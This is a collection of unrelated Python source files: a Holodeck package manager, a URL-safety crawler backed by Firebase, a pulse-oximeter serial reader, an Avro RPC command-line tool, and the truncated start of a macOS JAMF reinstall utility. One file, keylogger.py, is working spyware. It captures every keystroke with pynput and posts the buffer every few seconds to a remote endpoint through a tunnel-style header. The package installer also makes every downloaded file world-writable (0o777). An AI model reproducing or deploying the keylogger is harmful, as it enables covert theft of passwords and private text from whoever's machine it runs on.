    print(base_indent * ' ', "{}-{}:".format(scenario["world"], scenario["name"]))
    if "agents" in scenario:
        _print_agent_info(scenario["agents"], base_indent + 2)
def install(package_name, url=None):
    """Installs a holodeck package.

    Args:
        package_name (:obj:`str`): The name of the package to install
        url (:obj:`str`, optional): Explicit download URL; derived from the
            package name, version and platform when omitted.
    """
    if package_name is None and url is None:
        raise HolodeckException("You must specify the URL or a valid package name")
    _check_for_old_versions()
    holodeck_path = util.get_holodeck_path()
    install_path = os.path.join(holodeck_path, "worlds", package_name)
    if url is None:
        # Derive the backend URL, e.g.
        # %backend%/packages/0.1.0/DefaultWorlds/Linux.zip
        packages = available_packages()
        if package_name not in packages:
            print("Package not found. Available packages are:", file=sys.stderr)
            pprint.pprint(packages, width=10, indent=4, stream=sys.stderr)
            return
        url = "{backend_url}packages/{holodeck_version}/{package_name}/{platform}.zip".format(
            backend_url=BACKEND_URL,
            holodeck_version=util.get_holodeck_version(),
            package_name=package_name,
            platform=util.get_os_key())
    print("Installing {} from {} to {}".format(package_name, url, install_path))
    _download_binary(url, install_path)
def _check_for_old_versions():
    """Checks for old versions of the binary and tells the user they can remove them.

    If there is an ignore_old_packages file, it will stay silent.
    """
    # HOLODECKPATH turns off the binary folder versioning
    if "HOLODECKPATH" in os.environ:
        return
    path = util._get_holodeck_folder()
    if not os.path.exists(path):
        return
    not_matching = []
    for f in os.listdir(path):
        f_path = os.path.join(path, f)
        if f == "ignore_old_packages":
            # User opted out of the warning entirely.
            return
        if f == util.get_holodeck_version():
            continue
        elif not os.path.isfile(f_path):
            # A directory that isn't the current version: an old install.
            not_matching.append(f)
    if not_matching:
        print("**********************************************")
        print("* You have old versions of Holodeck packages *")
        print("**********************************************")
        print("Use packagemanager.prune() to delete old packages")
        print("Versions:", not_matching)
        # BUGFIX: corrected the user-facing typo "surpress" -> "suppress".
        print("Place an `ignore_old_packages` file in {} to suppress this message".format(path))
        print()
def prune():
    """Prunes old versions of holodeck, other than the running version.

    **DO NOT USE WITH HOLODECKPATH**

    Don't use this function if you have overidden the path.
    """
    if "HOLODECKPATH" in os.environ:
        # BUGFIX: print() takes `file=`, not `stream=` -- the original raised
        # TypeError whenever this branch was hit.
        print("This function is not available when using HOLODECKPATH", file=sys.stderr)
        return
    holodeck_folder = util._get_holodeck_folder()
    # Delete everything in holodeck_folder that isn't the current holodeck version
    for entry in os.listdir(holodeck_folder):
        entry_path = os.path.join(holodeck_folder, entry)
        if os.path.isfile(entry_path):
            continue
        if entry == util.get_holodeck_version():
            continue
        # Delete it!
        print("Deleting {}".format(entry_path))
        shutil.rmtree(entry_path)
    print("Done")
def remove(package_name):
    """Removes a holodeck package.

    Args:
        package_name (:obj:`str`): the name of the package to remove
    """
    for config, path in _iter_packages():
        if config["name"] != package_name:
            continue
        shutil.rmtree(path)
def remove_all_packages():
    """Removes all holodeck packages."""
    for _, pkg_path in _iter_packages():
        shutil.rmtree(pkg_path)
def load_scenario_file(scenario_path):
    """
    Loads the scenario config file and returns a dictionary containing the configuration

    Args:
        scenario_path (:obj:`str`): Path to the configuration file

    Returns:
        :obj:`dict`: A dictionary containing the configuration file
    """
    with open(scenario_path, 'r') as config_file:
        return json.load(config_file)
def get_scenario(scenario_name):
    """Gets the scenario configuration associated with the given name

    Args:
        scenario_name (:obj:`str`): name of the configuration to load - eg "UrbanCity-Follow"
            Must be an exact match. Name must be unique among all installed packages

    Returns:
        :obj:`dict`: A dictionary containing the configuration file
    """
    config_path = _find_file_in_worlds_dir(scenario_name + ".json")
    if not config_path:
        raise FileNotFoundError(
            "The file `{file}.json` could not be found in {path}. "
            "Make sure the package that contains {file} "
            "is installed.".format(file=scenario_name, path=util.get_holodeck_path()))
    return load_scenario_file(config_path)
def get_binary_path_for_package(package_name):
    """Gets the path to the binary of a specific package.

    Args:
        package_name (:obj:`str`): Name of the package to search for

    Returns:
        :obj:`str`: Returns the path to the config directory

    Raises:
        NotFoundException: When the package requested is not found
    """
    for config, path in _iter_packages():
        try:
            if config["name"] == package_name:
                return os.path.join(path, config["path"])
        except KeyError:
            # Malformed config (missing "name"/"path"): report, keep scanning.
            # CLEANUP: dropped the unused `as e` binding from the original.
            print("Error parsing config file for {}".format(path))
    raise NotFoundException("Package `{}` not found!".format(package_name))
def get_binary_path_for_scenario(scenario_name):
    """Gets the path to the binary for a given scenario name

    Args:
        scenario_name (:obj:`str`): name of the configuration to load - eg "UrbanCity-Follow"
            Must be an exact match. Name must be unique among all installed packages

    Returns:
        :obj:`dict`: A dictionary containing the configuration file
    """
    scenario_path = _find_file_in_worlds_dir(scenario_name + ".json")
    package_root = os.path.dirname(scenario_path)
    with open(os.path.join(package_root, "config.json"), 'r') as config_file:
        package_config = json.load(config_file)
    return os.path.join(package_root, package_config["path"])
def get_package_config_for_scenario(scenario):
    """For the given scenario, returns the package config associated with it (config.json)

    Args:
        scenario (:obj:`dict`): scenario dict to look up the package for

    Returns:
        :obj:`dict`: package configuration dictionary
    """
    target_world = scenario["world"]
    for config, _ in _iter_packages():
        if any(world["name"] == target_world for world in config["worlds"]):
            return config
    raise HolodeckException("Could not find a package that contains world {}".format(target_world))
def _iter_packages():
    """Yield (config_dict, package_path) for every installed package."""
    worlds_path = os.path.join(util.get_holodeck_path(), "worlds")
    if not os.path.exists(worlds_path):
        os.makedirs(worlds_path)
    for dir_name in os.listdir(worlds_path):
        full_path = os.path.join(worlds_path, dir_name)
        if not os.path.isdir(full_path):
            continue
        for file_name in os.listdir(full_path):
            if file_name != "config.json":
                continue
            with open(os.path.join(full_path, file_name), 'r') as f:
                yield json.load(f), full_path
def _iter_scenarios(world_name):
    """Iterates over the scenarios associated with world_name.

    Note that world_name needs to be unique among all packages

    Args:
        world_name (:obj:`str`): name of the world

    Returns: config_dict, path_to_config
    """
    # Find a scenario for this world
    a_scenario = _find_file_in_worlds_dir("{}-*".format(world_name))
    # BUGFIX: _find_file_in_worlds_dir returns "" (not None) when nothing is
    # found, so the original `if a_scenario is None` could never trigger and
    # the code fell through with an empty path. Test for falsy instead.
    if not a_scenario:
        return
    # Find the parent path of that file
    world_path = os.path.abspath(os.path.join(a_scenario, os.pardir))
    if not os.path.exists(world_path):
        os.makedirs(world_path)
    for file_name in os.listdir(world_path):
        if file_name == "config.json":
            continue
        if not file_name.endswith(".json"):
            continue
        if not fnmatch.fnmatch(file_name, "{}-*.json".format(world_name)):
            continue
        full_path = os.path.join(world_path, file_name)
        with open(full_path, 'r') as f:
            config = json.load(f)
        yield config, full_path
def _download_binary(binary_location, install_location, block_size=1000000):
    """Download the zip at binary_location, show a progress bar, and extract
    it into install_location (fixing permissions on POSIX)."""
    def file_writer_worker(tmp_fd, length, queue):
        # Drains the download queue into the temp file while rendering a
        # 20-character progress bar on stdout.
        max_width = 20
        percent_per_block = 100 // max_width
        amount_written = 0
        while amount_written < length:
            tmp_fd.write(queue.get())
            # NOTE(review): the final chunk is usually shorter than
            # block_size, so amount_written overshoots `length`; that only
            # terminates the loop, the byte count is not used elsewhere.
            amount_written += block_size
            percent_done = 100 * amount_written / length
            int_percent = int(percent_done)
            num_blocks = int_percent // percent_per_block
            blocks = chr(0x2588) * num_blocks
            spaces = " " * (max_width - num_blocks)
            try:
                sys.stdout.write("\r|" + blocks + spaces + "| %d%%" % int_percent)
            except UnicodeEncodeError:
                # Terminals that can't render the block character fall back
                # to a plain percentage.
                print("\r" + str(int_percent) + "%", end="")
            sys.stdout.flush()
    queue = Queue()
    tmp_fd = tempfile.TemporaryFile(suffix=".zip")
    with urllib.request.urlopen(binary_location) as conn:
        file_size = int(conn.headers["Content-Length"])
        print("File size:", util.human_readable_size(file_size))
        amount_read = 0
        # Writer runs in a separate thread; this loop only downloads.
        write_thread = Thread(target=file_writer_worker, args=(tmp_fd, file_size, queue))
        write_thread.start()
        while amount_read < file_size:
            queue.put(conn.read(block_size))
            amount_read += block_size
        write_thread.join()
    print()
    # Unzip the binary
    # Note the contents of the ZIP file get extracted straight into the
    # install directory, so the zip's structure should look like
    # file.zip/config.json not file.zip/file/config.json
    print("Unpacking worlds...")
    with zipfile.ZipFile(tmp_fd, 'r') as zip_file:
        zip_file.extractall(install_location)
    if os.name == "posix":
        print("Fixing Permissions")
        _make_excecutable(install_location)
    print("Finished.")
def _make_excecutable(install_path):
for path, _, files in os.walk(install_path):
for f in files:
os.chmod(os.path.join(path, f), 0o777)
|
crawler.py | #!/usr/bin/env python
import certifi
import google as google
import requests
import yaml
import firebase_admin
import hashlib
import threading
from googlesearch import search
from firebase_admin import credentials
from firebase_admin import firestore
from datetime import datetime
from urllib.parse import urlsplit
###############
# GLOBAL VARS #
###############
verbose_logging = False
# Simple way to create a structured way of printing log statements.
def log_print(msg, status='notice'):
    """Print msg with a bracketed status tag; status 'none' prints it bare."""
    prefix = ''
    suffix = ''
    if status == 'none':
        print(msg)
        return
    tags = {
        'error': '[ERROR]: ',
        'notice': '[NOTICE]: ',
        'critical': '[CRITICAL]: ',
        'success': '[OK]: ',
        'ok': '[OK]: ',
    }
    # Any unrecognised status falls back to the NOTICE tag.
    print(prefix + tags.get(status, '[NOTICE]: ') + msg + suffix)
######################
# CONFIG SEARCH INIT #
######################
######################
# CONFIG SEARCH INIT #
######################
print('Started at: ' + str(datetime.now()))
log_print('Initialising configuration file.')
config = ''
with open("crawler_config.yml", 'r') as config_stream:
    try:
        # NOTE(review): yaml.load without an explicit Loader is deprecated
        # and unsafe on untrusted input; here it reads a local config file.
        config = yaml.load(config_stream)
        # Log that the config was loaded successfully.
        log_print('Configuration loaded', 'success')
    except yaml.YAMLError as exc:
        log_print('Failed to initialise the configuration.', 'critical')
        print(exc)

#################
# FIREBASE INIT #
#################
log_print('Initialising Firebase configuration')
service_account_json_path = config['firebase']['service_account_json_path']
db_collection = config['firebase']['collection_name']
cred = credentials.Certificate(service_account_json_path)
default_app = firebase_admin.initialize_app(cred)
# Module-wide Firestore client used by store_data()/verify_and_store_url().
db = firestore.client()
#####################
# GENERAL FUNCTIONS #
#####################
def request_url(url):
    """Fetch url and classify the outcome.

    Returns a 4-element list [code, final_url, status_code, history]:
    code 1 = success, 2 = SSL error, 3 = any other failure (for codes 2
    and 3 the remaining slots are None).
    """
    try:
        r = requests.get(url, verify=certifi.where(), allow_redirects=True, timeout=10)
        if verbose_logging:
            print(r.url)
            print(r.status_code)
            print(r.history)
        return [1, r.url, r.status_code, r.history]
    except requests.exceptions.SSLError as error:
        if verbose_logging:
            print(error)
        return [2, None, None, None]
    except requests.exceptions.RequestException as error:
        # NOTE: this also covers ConnectTimeout; the original had a separate
        # handler for it AFTER this broader clause, which was unreachable.
        if verbose_logging:
            print(error)
        return [3, None, None, None]
    except Exception:
        # BUGFIX(cleanup): narrowed the original bare `except:` so that
        # KeyboardInterrupt/SystemExit are no longer swallowed.
        return [3, None, None, None]
# Where the magic happens.
def verify_url(url):
    """Check whether url is safe to visit.

    Returns True (HTTPS works and HTTP redirects to HTTPS), False
    (unsafe), or None (dead URL).
    """
    # Strip off the http(s) part of the url if present.
    if 'https://' in url:
        url = url.replace('https://', '')
    elif 'http://' in url:
        url = url.replace('http://', '')
    # Strip of any trailing or leading slashes
    url = url.strip('/')
    log_print('Verifying URL: ' + url, 'ok')
    http_result = request_url('http://' + url)
    https_result = request_url('https://' + url)
    # Actual logic to determine if the url is safe or not.
    safe_to_visit = False
    # If we got an RequestException on both levels, we have a dead url most certainly
    if https_result[0] == 3 and http_result[0] == 3:
        safe_to_visit = None
    # If the https request failed, but http works, it's considered unsafe.
    if http_result[0] != 3 and https_result[0] == 3:
        safe_to_visit = False
    # If we have a dead URL we don't need to check the redirects and certificate errors.
    if safe_to_visit is not None:
        # We only have a safe website when we have NO certificate errors
        # and if HTTP is correctly redirected to HTTPS.
        # BUGFIX: require both requests to have SUCCEEDED (code 1) before
        # inspecting their final URLs -- the original only excluded code 2
        # and crashed with a TypeError (`in` against None) when exactly one
        # request failed with a RequestException.
        if (http_result[0] == 1 and https_result[0] == 1
                and 'https://' in http_result[1] and 'https://' in https_result[1]):
            safe_to_visit = True
    if safe_to_visit:
        safety = True
        log_print('SAFE to visit', 'ok')
    elif safe_to_visit is None:
        safety = None
        log_print('DEAD URL', 'ok')
    else:
        safety = False
        log_print('UNSAFE to visit', 'ok')
    return safety
# Function to store data in Firebase.
def store_data(url, data):
    """Store data in Firestore, keyed by the MD5 hash of the url."""
    doc_id = hashlib.md5(url.encode()).hexdigest()
    db.collection(db_collection).document(doc_id).set(data)
# Function to do as a thread.
def verify_and_store_url(urls, search_string):
    """Thread worker: verify each url and persist the verdict to Firestore,
    skipping urls that already have a stored result."""
    for url in urls:
        doc_ref = db.collection(db_collection).document(hashlib.md5(url.encode()).hexdigest())
        # BUGFIX: the original did `doc_ref.get()` followed by an
        # unconditional `continue`, so every url was skipped whenever get()
        # returned instead of raising. Current Firestore clients return a
        # snapshot (with .exists) for missing documents, so check that; the
        # NotFound handler is kept for older client versions.
        try:
            if doc_ref.get().exists:
                continue
        except google.cloud.exceptions.NotFound:
            pass
        # Check if the URL is safe.
        safety = verify_url(url)
        # store the data in Firebase.
        data = {
            u'method': u'search',
            u'search_key': str(search_string),
            u'URL': str(url),
            u'safety': str(safety)
        }
        store_data(url, data)
######################
# GOOGLE SEARCH INIT #
######################
######################
# GOOGLE SEARCH INIT #
######################
if config['google_search']['enabled']:
    log_print('Google Search enabled.')
    google_search_config = config['google_search']
    # Set some other variables.
    top_level_domain = google_search_config['top_level_domain']
    language = google_search_config['language']
    number_of_results = google_search_config['number_of_results']
    timeout = google_search_config['timeout']
    log_print('Initialising the Google Keywords configuration.')
    google_keywords_config = ''
    with open("google_keywords.yml", 'r') as keywords_stream:
        try:
            google_keywords_config = yaml.load(keywords_stream)
            log_print('Google Keywords configuration loaded', 'success')
        except yaml.YAMLError as exc:
            log_print('Failed to initialise the Google Keywords configuration.', 'critical')
            print(exc)
    # Load extra params from the config.
    force_include_links = google_keywords_config['force_include_links']
    exclude_urls = google_keywords_config['exclude_urls']
    search_strings = google_keywords_config['search_strings']

    ########################
    # FORCE INCLUDED LINKS #
    ########################
    if force_include_links is not None and len(force_include_links) > 0:
        log_print('Processing all force include links.')
        log_print('---------------------------------------------', 'none')
        for force_include_link in force_include_links:
            safety = verify_url(force_include_link)
            # store the data in Firebase.
            data = {
                u'method': u'force',
                u'URL': str(force_include_link),
                u'safety': str(safety)
            }
            store_data(force_include_link, data)
    else:
        log_print('No links force included.')

    ##################
    # SEARCH STRINGS #
    ##################
    if search_strings is not None and len(search_strings) > 0:
        log_print('Start searching for all keywords on Google')
        log_print('---------------------------------------------', 'none')
        threads = []
        for search_string in search_strings:
            log_print('Starting to search for: ' + search_string)
            counter = 0
            matched_urls = []
            # We keep searching until we reached the max results.
            for search_result in search(search_string, tld=top_level_domain, lang=language, pause=timeout):
                # Get the base domain of the URL.
                base_domain = "{0.scheme}://{0.netloc}/".format(urlsplit(search_result))
                # We need to skip all the exclude URL's.
                if any([excl in base_domain for excl in exclude_urls]):
                    continue
                # Check if the base URL isn't already in the matched_urls list.
                if base_domain in matched_urls:
                    continue
                # Increase the counter.
                counter += 1
                # Store the URLS in the matched urls array (so we're not doing two actions at the same time).
                matched_urls.append(base_domain)
                # Break the for loop if we reached the maximum results.
                if counter == number_of_results:
                    break
            # Create a thread to process all the URLS.
            thread = threading.Thread(target=verify_and_store_url, args=(matched_urls, search_string))
            thread.daemon = True
            threads.append(thread)
            thread.start()
        # Join all the threads so we can continue until they are finished.
        for thread in threads:
            thread.join()
    else:
        log_print('No search strings provided.')

print('Finished at: ' + str(datetime.now()))
|
keylogger.py | from pynput import keyboard
from threading import Thread
from requests import post
from time import sleep
from json import dumps
# Endpoint the captured keys are POSTed to, and the flush interval (seconds).
url = "http://127.0.0.1:5000/"
delay = 5
headers = {
    "Content-Type": "application/json",
    "User-Agent": "localtunnel"
}
# Maps pynput key reprs (e.g. "<97>") to friendly names; filled in below.
keys = {}
# Buffer of keystrokes accumulated since the last POST.
cle = ""
def envoi_fichier():
    """Background loop: every `delay` seconds, POST the accumulated
    keystroke buffer to the server and reset it."""
    global cle
    while True:
        print(post(url, headers=headers, data=dumps({"key": cle}).encode("utf-8")))
        # NOTE(review): keystrokes typed between the post() above and this
        # reset are lost -- there is no locking around `cle`.
        cle = ""
        sleep(delay)
# Map numpad key codes "<96>".."<105>" to the digits "0".."9".
# BUGFIX: the original range(11) also mapped "<106>" -- which is the numpad
# '*' key, not a digit -- to the two-character string "10".
for i in range(10):
    keys["<" + str(i + 96) + ">"] = str(i)
def on_press(key):
    """pynput callback: normalise the pressed key to a readable token and
    append it (newline-terminated) to the global `cle` buffer."""
    global cle
    key = str(key)
    # Numpad digits arrive as "<96>".."<106>"; translate via the keys map.
    if key in keys:
        key = keys[key]
    # Printable characters are repr'd with quotes ("'a'"); strip them.
    # NOTE(review): assumes len(key) >= 3 here; a shorter repr would raise
    # IndexError -- confirm against pynput's repr format.
    if key[0] == "'" and key[2] == "'":
        key = key[1]
    # Friendly names for common special keys.
    if key == "Key.ctrl_l":
        key = "ctrl"
    if key == "Key.caps_lock":
        key = "maj_lock"
    if key == "Key.shift":
        key = "shift"
    if key == "Key.enter":
        key = "enter"
    if key == "Key.space":
        key = "space"
    if key == "Key.backspace":
        key = "delete"
    # Ctrl-chords arrive as escaped control characters.
    if key == str(r"'\x03'"):
        key = "ctrl_c"
    if key == str(r"'\x16'"):
        key = "ctrl_v"
    if key == str(r"'\x13'"):
        key = "ctrl_s"
    if key == str(r"'\x06'"):
        key = "ctrl_f"
    if key == str(r"'\x08'"):
        key = "ctrl_h"
    cle += f"{key}\n"
# Start the uploader loop in the background, then block this (main) thread
# forwarding keyboard events to on_press.
Thread(target=envoi_fichier).start()
with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
|
cms50e.py | import sys
import threading
import serial
from time import sleep
from blessings import Terminal
# Bit 7 set marks the first byte of each 5-byte frame from the device.
SYNC = 0x80
# NOTE(review): PULSE is defined but unused in this file.
PULSE = 0x40
# Terminal display template for print_output().
OUTPUT = """
Heartrate:\t\t {}
Oxygen saturation:\t {}
Pulse waveform:\t\t {}
Hit Ctrl+C to exit.
"""
class PulseOximeterReader(object):
    """
    This class reads data from a Contec CMS50E pulse oximeter. The data
    is read by a separate thread.

    The data is output to the terminal. Use the `run` method to start.
    """

    def __init__(self,
                 port,
                 baudrate=19200,
                 timeout=2,
                 parity=serial.PARITY_ODD):
        self.waveform = 0
        self.heartrate = 0
        self.oxygen = 0
        self.reading = False
        self.terminal = Terminal()
        self.thread = None
        self.serial = serial.Serial(port,
                                    baudrate=baudrate,
                                    timeout=timeout,
                                    parity=parity)

    def run(self):
        """Start the reader thread and refresh the display until Ctrl+C."""
        self.reading = True
        self.sync_stream()
        self.thread = threading.Thread(target=self._run_thread)
        self.thread.start()
        try:
            while self.thread.is_alive():
                self.print_output()
                sleep(0.05)
        except KeyboardInterrupt:
            # Signals the reader thread to exit its loop.
            self.reading = False

    def sync_stream(self):
        """Find the sync bit and read five and five bytes from there."""
        while True:
            data = self.serial.read(5)
            for i, byte in enumerate(data):
                if byte & SYNC:
                    self.serial.read(i)  # throw away subsequent i bytes
                    return

    def _run_thread(self):
        # Reader thread: consume one 5-byte frame at a time.
        while self.reading:
            data = self.serial.read(5)
            self.process_data(data)

    def process_data(self, data):
        """Process one 5-byte frame and store the readings on the reader.

        BUGFIX: the original re-read five bytes from the serial port here,
        ignoring the frame already read by _run_thread -- every other frame
        was silently dropped. Use the frame passed in instead, and skip a
        misaligned frame after re-synchronising.
        """
        # In case we go out of sync, re-synchronise the stream.
        # This might happen if data upload is enabled on the device.
        if not data[0] & SYNC:
            self.sync_stream()
            return
        self.waveform = data[1]
        self.heartrate = data[3]
        self.oxygen = data[4]

    def print_output(self):
        """Render the current readings full-screen."""
        with self.terminal.fullscreen():
            print(
                OUTPUT.format(
                    self.heartrate, self.oxygen, self.waveform
                )
            )
if __name__ == '__main__':
    # BUG FIX: `if not sys.argv[1]` raised IndexError when no argument was
    # given, and execution fell through to the constructor even after the
    # warning was printed. Check the length and exit instead.
    if len(sys.argv) < 2 or not sys.argv[1]:
        print('Please provide the device identifier as an argument.')
        sys.exit(1)
    reader = PulseOximeterReader(sys.argv[1])
    reader.run()
|
tool.py | #!/usr/bin/env python3
# -*- mode: python -*-
# -*- coding: utf-8 -*-
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
class GenericResponder(avro.ipc.Responder):
    """Responder that answers a single named message with a canned datum."""
    def __init__(self, proto, msg, datum):
        """proto: path to the Avro protocol file; msg: message name to serve;
        datum: the value returned for that message."""
        # BUG FIX: the protocol file handle was opened and never closed;
        # use a context manager.
        with open(proto, 'rb') as proto_file:
            proto_json = proto_file.read()
        avro.ipc.Responder.__init__(self, avro.protocol.parse(proto_json))
        self.msg = msg
        self.datum = datum
    def invoke(self, message, request):
        # Returns the canned datum for the configured message; any other
        # message falls through and yields None.
        if message.name == self.msg:
            print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
            # server will shut down after processing a single Avro request
            global server_should_shutdown
            server_should_shutdown = True
            return self.datum
class GenericHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        """Serve one framed Avro RPC call using the module-level responder."""
        self.responder = responder
        request = avro.ipc.FramedReader(self.rfile).read_framed_message()
        response_body = self.responder.respond(request)
        self.send_response(200)
        self.send_header('Content-Type', 'avro/binary')
        self.end_headers()
        avro.ipc.FramedWriter(self.wfile).write_framed_message(response_body)
        if server_should_shutdown:
            # One-shot server: stop it from a daemon thread so shutdown()
            # does not deadlock against the request currently being handled.
            print("Shutting down server.", file=sys.stderr)
            shutdown_thread = threading.Thread(target=self.server.shutdown)
            shutdown_thread.daemon = True
            shutdown_thread.start()
def run_server(uri, proto, msg, datum):
    """Start a one-shot Avro RPC server answering `msg` with `datum`.

    uri: http URI whose host/port the server binds to.
    proto: path to the Avro protocol file.
    """
    # BUG FIX: `urllib.parse` is a module, not a callable; the original
    # `urllib.parse(uri)` raised TypeError. Use urlparse().
    url_obj = urllib.parse.urlparse(uri)
    server_addr = (url_obj.hostname, url_obj.port)
    global responder
    global server_should_shutdown
    server_should_shutdown = False
    responder = GenericResponder(proto, msg, datum)
    # BUG FIX: allow_reuse_address must be set before the server binds its
    # socket; setting it on the instance after construction had no effect.
    http.server.HTTPServer.allow_reuse_address = True
    server = http.server.HTTPServer(server_addr, GenericHandler)
    print("Port: %s" % server.server_port)
    sys.stdout.flush()
    print("Starting server.", file=sys.stderr)
    # Blocks until GenericHandler triggers shutdown after the first request.
    server.serve_forever()
def send_message(uri, proto, msg, datum):
    """Send one Avro RPC request to `uri` and print the response.

    proto: path to the Avro protocol file; msg: message name; datum: payload.
    """
    # BUG FIX: `urllib.parse` is a module, not a callable; the original
    # `urllib.parse(uri)` raised TypeError. Use urlparse().
    url_obj = urllib.parse.urlparse(uri)
    client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
    # BUG FIX: close the protocol file instead of leaking the handle.
    with open(proto, 'rb') as proto_file:
        proto_json = proto_file.read()
    requestor = avro.ipc.Requestor(avro.protocol.parse(proto_json), client)
    print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
    """Return stdin for the conventional '-' name, else `f` opened binary."""
    if f == '-':
        return sys.stdin
    return open(f, 'rb')
def _parse_rpc_datum(args, usage_str):
    """Parse the optional (-data d | -file f) tail shared by rpcreceive/rpcsend.

    Returns (datum, error_code); error_code is None on success, 1 on failure
    (usage or unimplemented option, already printed).
    """
    if len(args) <= 5:
        return None, None
    if args[5] == "-file":
        # Take the first record of the Avro container file as the datum.
        with open(args[6], 'rb') as reader:
            dfr = avro.datafile.DataFileReader(reader, avro.io.DatumReader())
            datum = next(dfr)
        return datum, None
    if args[5] == "-data":
        print("JSON Decoder not yet implemented.")
        return None, 1
    print(usage_str)
    return None, 1

def main(args=sys.argv):
    """Entry point: dump an Avro file, or act as a one-shot RPC peer.

    Returns a process exit code (0 success / fall-through, 1 usage error).
    """
    if len(args) == 1:
        print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
        return 1
    if args[1] == "dump":
        if len(args) != 3:
            print("Usage: %s dump input_file" % args[0])
            return 1
        for d in avro.datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
            print(repr(d))
    elif args[1] in ("rpcreceive", "rpcsend"):
        # The two RPC subcommands share identical argument handling; the only
        # difference is whether we serve or send. (Previously duplicated.)
        usage_str = "Usage: %s %s uri protocol_file " % (args[0], args[1])
        usage_str += "message_name (-data d | -file f)"
        if len(args) not in [5, 7]:
            print(usage_str)
            return 1
        uri, proto, msg = args[2:5]
        datum, err = _parse_rpc_datum(args, usage_str)
        if err:
            return err
        if args[1] == "rpcreceive":
            run_server(uri, proto, msg, datum)
        else:
            send_message(uri, proto, msg, datum)
    # Unknown subcommands fall through and return success, as before.
    return 0
if __name__ == "__main__":
    # Running avro/tool.py directly puts the avro package directory on
    # sys.path, where the sibling io.py shadows the stdlib io module.
    if os.path.dirname(avro.io.__file__) in sys.path:
        warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision "
                      "with the python io module. Try doing `python -m avro.tool` instead.")
    sys.exit(main(sys.argv))
|
Reinstall_oneclick_mac.py | #!/usr/local/bin/python2.7
# -*- coding: utf-8 -*-
"""
Programmers : VBNIN - IPEchanges
Python version : 2.7.16
This python app allows the user to reset its session with default settings loaded from the JAMF server
Changelog :
v0.1.1 : App creation
v0.2.2 : App working for computer reset
v0.3.1 : App modified to check for local installers and remote installers on Jamf
v0.3.2 : Modified the error messages during execution
v0.3.3 : Modifications added to make the script OK
v0.4.1 : Code modified to check if local installer exists before remote download
v0.4.2 : Removed support phone number
v0.4.3 : Added support for forbidden character in computer's name
v0.4.4 : Changed color for ongoing download
v0.4.5 : add list_building fonction for only admin
v0.5.2 : Added mdm profile removing
v0.6.1 : Disabled MDM profile removing and added json export to distant SFTP
v0.6.2 : Modified reinstall command in delete computer function (removed applicationpath flag)
v0.7.1 : Massive code update
v0.7.2 : Changed the location of log button
v0.7.3 : Removed pop up after launch reset command
v0.7.4 : Added autologon option
v0.7.5 : Added caffeine module to prevent mac from sleeping
v0.7.6 : Added jamfHelper splash screen before reboot
"""
# Application display name and version string, shown in the window title.
title = 'JAMF OneClick Reinstall'
version = 'Version 0.7.6 - 21/08/2019'
###########################################################################
#### Import internal libraries
###########################################################################
import Tkinter as tk
import tkMessageBox
import ttk
import tkFont as tkfont
import logging
import sys
import os
import subprocess
import re
import threading
import time
import csv
import json
from logging.handlers import RotatingFileHandler
###########################################################################
### Activatin main logger in a rotated log file
###########################################################################
# Set up a rotating file log (5 x 10 MB) plus console logging; the app cannot
# run without its log file, so any failure here aborts the process.
try:
    logs_file = '/var/log/jamf_ftv.log'
    handler = RotatingFileHandler(logs_file, maxBytes=10000000, backupCount=5)
    handler.setFormatter(logging.Formatter('%(asctime)s : %(message)s'))
    logging.basicConfig(level=logging.INFO, format='%(asctime)s : %(message)s')
    log = logging.getLogger(__name__)
    log.addHandler(handler)
    log.info("Initialisation du fichier de log dans {}".format(logs_file))
except Exception as e:
    sys.exit("*** Erreur *** Impossible d'initialiser le fichier de logs : {}".format(e))
###########################################################################
### Tools API Jamf
###########################################################################
def get_serial():
    """Getting computer's serial number.

    Returns the Mac's hardware serial as a string, or None when it cannot
    be determined (command missing, no output, parse failure).
    """
    try:
        cmd = "system_profiler SPHardwareDataType | grep 'Serial Number' | awk '{print $4}'"
        result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        sn = [line for line in result.stdout]
        # Strip any non-alphanumeric characters (trailing newline etc.).
        my_serial = re.sub(r'\W+', '', sn[0])
        log.info('Votre numรฉro de sรฉrie est : {}'.format(my_serial))
        return my_serial
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; any real failure still maps to None as before.
        return None
def list_computers(headers, auth):
    '''List all the computers in Jamf'''
    endpoint = jamf['url_jamf'] + '/JSSResource/computers'
    # Basic-auth GET against the classic JSS API; returns the raw list.
    resp = requests.get(endpoint, headers=headers, auth=(auth['api_user'], auth['api_pass']))
    return resp.json()['computers']
def list_buildings(headers, auth):
    '''List all the available buildings in Jamf'''
    endpoint = jamf['url_jamf'] + '/JSSResource/buildings'
    resp = requests.get(endpoint, headers=headers, auth=(auth['api_user'], auth['api_pass']))
    # Callers only need the building names.
    return [building["name"] for building in resp.json()['buildings']]
def computer_detail(id, headers, auth):
    '''Get all the details of this Mac.'''
    # NOTE: parameter name `id` shadows the builtin but is part of the
    # public signature, so it is kept.
    endpoint = '{}/JSSResource/computers/id/{}'.format(jamf['url_jamf'], id)
    resp = requests.get(endpoint, headers=headers, auth=(auth['api_user'], auth['api_pass']))
    return resp.json()['computer']
def search_local_installer(recommended_version):
    '''Search for a macOS installer and check its version in the package.

    Returns the installer app name on a version match, False otherwise.
    '''
    plist_path = "/Applications/install macOS Mojave.app/Contents/version.plist"
